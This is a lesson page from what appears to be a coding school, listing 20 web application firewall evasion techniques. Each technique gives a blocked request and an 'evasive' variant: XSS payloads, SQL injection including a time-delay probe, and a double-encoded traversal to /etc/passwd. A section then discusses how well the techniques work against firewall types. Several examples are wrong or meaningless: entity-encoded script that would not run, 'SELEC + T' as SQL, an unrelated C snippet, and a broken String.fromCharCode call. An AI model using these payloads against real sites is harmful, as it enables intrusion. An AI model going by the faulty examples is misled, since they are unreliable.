Self-paced

Explore our extensive collection of courses designed to help you master various subjects and skills. Whether you're a beginner or an advanced learner, there's something here for everyone.

Bootcamp

Learn live

Join us for our free workshops, webinars, and other events to learn more about our programs and get started on your journey to becoming a developer.

Upcoming live events

Learning library

For all the self-taught geeks out there, here is our content library with most of the learning materials we have produced throughout the years.

It makes sense to start learning by reading and watching videos about fundamentals and how things work.

Search from all Lessons

LoginGet Started
← Back to Lessons
Edit on Github

Mastering Web App Firewall Evasion: Techniques and Best Practices

1. URL Encoding Technique
2. Unicode Technique
3. HTML Rendering Technique
4. Mixed Encoding Technique
5. Case Manipulation
6. Bypassing Filters with Comments
7. Parameter Pollution
8. Path Traversal with Double Encoding
9. Customizing User-Agent or Referrer Headers
10. Time-based SQL Injection (Blind SQL Injection)
11. HTTP Parameter Tampering
12. Payload Fragmentation
13. Testing and Logging Analysis
14. Wildcard Obfuscation
15. Token Breaker Technique
16. Tabs and Line Feed Technique
17. Uninitialized Variable Technique
18. Newline Technique
19. Junk Character Technique
20. Dynamic Payload Generation Technique
How Effective are these techniques mentioned above?
Conclusion

The following is a list of very specific hacking techniques you can use to work around (evade) firewalls, keep in mind that there are about a dozen types of firewalls and these techniques work with a portion of them.

Here’s a detailed explanation for each technique, including how to do it, a basic blocked request, and an updated request that may bypass the WAF:

1. URL Encoding Technique

How to do it:
Encode special characters in the payload using URL encoding (percent-encoding) to bypass WAF detection.

Blocked original request:

1<script>alert('XSS')</script>

Updated with URL encoding:

1%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

2. Unicode Technique

How to do it:
Convert characters in the payload to their Unicode equivalents to evade detection.

Blocked original request:

1<script>alert('XSS')</script>

Updated with Unicode encoding:

1\u003Cscript\u003Ealert('XSS')\u003C/script\u003E

3. HTML Rendering Technique

How to do it:
Use HTML entities to encode characters in the payload, which may render correctly in the browser but evade the WAF.

Blocked original request:

1<script>alert('XSS')</script>

Updated with HTML entities:

1&lt;script&gt;alert(&#x27;XSS&#x27;)&lt;/script&gt;

4. Mixed Encoding Technique

How to do it:
Combine multiple encoding techniques (e.g., URL encoding and HTML entities) in a single payload to confuse the WAF.

Blocked original request:

1<script>alert('XSS')</script>

Updated with mixed encoding:

1%3Cscript%3Ealert%28%26%2339%3BXSS%26%2339%3B%29%3C%2Fscript%3E

5. Case Manipulation

How to do it:
Combine uppercase and lowercase characters to create efficient payloads.

Blocked original request:

1<script>confirm()</script>

Updated with case-switching:

1<ScrIpT>confirm()</sCRiPt>

6. Bypassing Filters with Comments

How to do it:
Insert comments or extraneous characters within the payload to break up the patterns the WAF is looking for.

Blocked original request:

1SELECT * FROM users WHERE id=1;

Updated with comments:

1SELECT/*comment*/ * FROM users WHERE id=1;

7. Parameter Pollution

How to do it:
Send multiple parameters with the same name in a single request to confuse the WAF or web application.

Blocked original request:

1GET /search?q=malicious_query

Updated with parameter pollution:

1GET /search?q=benign_query&q=malicious_query

8. Path Traversal with Double Encoding

How to do it:
Use double encoding to bypass WAF rules that only check for single-encoded sequences.

Blocked original request:

1GET /../../etc/passwd

Updated with double encoding:

1GET /%252e%252e%252f%252e%252e%252fetc%252fpasswd

9. Customizing User-Agent or Referrer Headers

How to do it:
Modify the User-Agent or Referrer header to bypass WAF rules that may apply different rules based on these headers.

Blocked original request:

1GET /admin HTTP/1.1
2User-Agent: NormalBrowser

Updated with a custom User-Agent:

1GET /admin HTTP/1.1
2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36

10. Time-based SQL Injection (Blind SQL Injection)

How to do it:
Use time delays in SQL injection to infer information from the database without directly retrieving data.

Blocked original request:

1GET /search?q=' OR 1=1; --

Updated with time-based SQL injection:

1GET /search?q='; IF (1=1) WAITFOR DELAY '00:00:05'; --

11. HTTP Parameter Tampering

How to do it:
Modify parameters in HTTP requests, particularly POST requests, to bypass WAF rules focused on GET requests.

Blocked original request:

1POST /login HTTP/1.1
2username=admin&password=123456

Updated with parameter tampering:

1POST /login HTTP/1.1
2username=admin&password=wrong_password

12. Payload Fragmentation

How to do it:
Split the payload across multiple requests or packets to avoid detection by the WAF.

Blocked original request:

1<script>alert('XSS')</script>

Updated with payload fragmentation:

1<script>aler
2t('XSS')</script>

13. Testing and Logging Analysis

How to do it:
Analyze WAF logs and responses to identify which payloads are being blocked and adjust accordingly.

Blocked original request:

1GET /admin HTTP/1.1

Updated based on log analysis:

1GET /admin.php HTTP/1.1

14. Wildcard Obfuscation

How to do it:
Use wildcard characters in a way that confuses the WAF's pattern matching.

Blocked original request:

1SELECT * FROM users WHERE username='admin';

Updated with wildcard obfuscation:

1SELECT * FROM users WHERE username LIKE 'adm%';

15. Token Breaker Technique

How to do it:
Insert characters or elements that break the tokens the WAF uses to identify malicious patterns.

Blocked original request:

1SELECT * FROM users WHERE id=1;

Updated with token breaking:

1SELEC + T * FROM users WHERE id=1;

16. Tabs and Line Feed Technique

How to do it:
Insert tabs (\t) or line feeds (\n) within payloads to disrupt the pattern matching of the WAF.

Blocked original request:

1<script>alert('XSS')</script>

Updated with tabs and line feeds:

1<script>\n\talert('XSS')</script>

17. Uninitialized Variable Technique

How to do it:
Use uninitialized or rarely used variables in the payload to confuse the WAF’s detection algorithms.

Blocked original request:

1int x = 1; return x;

Updated with uninitialized variable:

1int x; return x = 1;

18. Newline Technique

How to do it:
Introduce newline characters within a payload to break up malicious patterns the WAF is scanning for.

Blocked original request:

1<script>alert('XSS')</script>

Updated with newline characters:

1<script>
2alert('XSS')
3</script>

19. Junk Character Technique

How to do it:
Insert random or irrelevant characters into the payload that the target application will ignore, but which might cause the WAF to overlook the attack.

Blocked original request:

1<script>alert('XSS')</script>

Updated with junk characters:

1<scri%00pt>alert('XSS')</scri%00pt>

20. Dynamic Payload Generation Technique

How to do it:
Generate payloads dynamically, so they change on each request, making it difficult for the WAF to recognize and block them.

Blocked original request:

1<script>alert('XSS')</script>

Updated with dynamic payload generation:

1<script>eval(String.fromCharCode(97,108,101,114,116)('XSS'))</script>

How Effective are these techniques mentioned above?

The firewall evasion techniques we discussed generally aim to bypass specific types of firewalls, particularly those that perform deep packet inspection or application-level filtering, like Web Application Firewalls (WAFs) and Next-Generation Firewalls (NGFWs). However, the effectiveness of these techniques can vary depending on the type of firewall, its configuration, and its specific capabilities. Here's how these techniques might interact with different types of firewalls:

1. Packet-Filtering Firewalls

  • Effectiveness of Techniques:
    • Packet-filtering firewalls primarily inspect IP addresses, port numbers, and protocols. Techniques like Case Manipulation or Tabs and Line Feed might not be relevant here since this type of firewall does not inspect payload content. Parameter Pollution might still work if the firewall is filtering based on specific parameters.
    • Token Breaker or Wildcard Obfuscation might bypass simple filtering rules if the firewall is configured to block specific commands or keywords in headers or URLs.

2. Stateful Inspection Firewalls

  • Effectiveness of Techniques:
    • Stateful firewalls track the state of connections, so techniques like HTTP Parameter Tampering might not work if the state of the connection is being closely monitored.
    • Payload Fragmentation might be more effective if the firewall is not capable of reassembling fragmented payloads for inspection.

3. Proxy Firewalls (Application-Level Gateways)

  • Effectiveness of Techniques:
    • Proxy firewalls inspect traffic at the application layer, so many of the techniques such as Unicode Encoding, HTML Rendering, Case Manipulation, and Mixed Encoding could be effective if the proxy is not configured to decode or normalize these variations.
    • Bypassing Filters with Comments and Dynamic Payload Generation may also be effective depending on the proxy’s ability to interpret the payload correctly.

4. Next-Generation Firewalls (NGFW)

  • Effectiveness of Techniques:
    • NGFWs are designed to detect and block more sophisticated threats, so techniques like Time-based SQL Injection and Wildcard Obfuscation might be less effective, especially if the NGFW includes Intrusion Prevention Systems (IPS) that recognize these patterns.
    • Techniques like Dynamic Payload Generation could still work if the payloads are sufficiently obfuscated or randomized.

5. Unified Threat Management (UTM) Firewalls

  • Effectiveness of Techniques:
    • UTMs include a variety of security functions, so a combination of techniques might be necessary to bypass them. Token Breaker and Uninitialized Variable Techniques might evade some of the automated detection rules, but their overall effectiveness will depend on the specific UTM configuration.

6. Virtual and Cloud Firewalls

  • Effectiveness of Techniques:
    • These firewalls often mimic the functionality of traditional firewalls but operate in virtualized environments. Techniques that rely on exploiting specific protocol weaknesses (like Path Traversal with Double Encoding or Tabs and Line Feed Techniques) might still work if the virtual or cloud firewall is not configured to normalize or decode these patterns.

7. Host-Based Firewalls

  • Effectiveness of Techniques:
    • Host-based firewalls typically focus on protecting a single device. Techniques like Junk Character Insertion or Unicode Technique might not be effective unless the host-based firewall inspects application-layer data.
    • Customizing User-Agent or Referrer Headers might work if the firewall is filtering based on these headers.

8. Hardware Firewalls

  • Effectiveness of Techniques:
    • Hardware firewalls, particularly those focused on network-layer filtering, might not be affected by many of the techniques aimed at WAFs or application-level filtering. Techniques like Packet Fragmentation or HTTP Parameter Tampering might still work, depending on how the hardware firewall is configured to handle such anomalies.

9. Web Application Firewalls (WAFs)

  • Effectiveness of Techniques:
    • The discussed techniques are particularly relevant to WAFs, as they are designed to protect against application-layer attacks like SQL injection, XSS, and others. Techniques like Case Manipulation, Bypassing Filters with Comments, and HTML Rendering Techniques are directly aimed at confusing or evading WAF detection.

Conclusion

Not all techniques are universally effective across all firewall types. Their success largely depends on the specific type of firewall, its configuration, and the nature of the traffic it inspects. Some techniques are more suited for application-layer firewalls like WAFs, while others might target simpler firewalls that filter at the network layer. Understanding the specific capabilities and configurations of the firewall in question is essential when applying evasion techniques.